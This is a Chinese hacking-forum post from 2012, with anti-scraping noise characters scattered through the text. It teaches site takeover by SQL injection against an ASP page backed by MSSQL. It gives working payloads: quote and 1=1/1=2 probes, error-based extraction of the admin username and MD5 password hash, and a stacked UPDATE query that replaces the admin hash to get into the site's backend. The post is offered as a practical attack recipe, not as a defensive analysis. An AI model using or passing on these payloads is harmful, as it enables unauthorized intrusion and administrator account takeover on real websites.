经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
/ e' b0 B- `4 N可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL): ?0 N! w, V" Q8 j6 d- t" n4 r
测试如下:% x7 b. X0 ~* g- t X
http://www.tmdsb.com/news.asp?id=121
6 J, l2 D' A1 @" R( p- ~+ Y3 z7 D在地址后输入单引号,显示
2 r0 Z2 z& A5 L. R8 K/ HMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
# j; L4 r) R, n6 J8 M5 q字符串 ’’’ 之前有未闭合的引号" h7 V1 Y1 K1 d" D* k
/news/tmdws.asp,行63/ o' f% k6 D& f
说明没有过滤单引号且数据库是MSSQL.
9 s& a6 O1 W) H: O4 v& Oand 1=1正常。and 1=2出错。肯定存在注入
, I# H# L& k2 P5 q9 n接着输入7 g: P- O5 \# O; |( U+ w
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
, R1 W. N7 V8 `* u# p1 `得到帐号为:admin
, W; {6 F: O8 J- J. P0 S' yhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)) G! \2 p- z" P) ?' R# v I3 m
得到密码为:a4716077c2ba075c
1 K% I% Q! y( V1 N$ a( p: p/ R接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294331 b% G& x2 S- P- Z, m
命令如下 :
: a2 c* e* s6 m* f" I+ D;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
' K$ a5 _3 Z3 C$ i这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41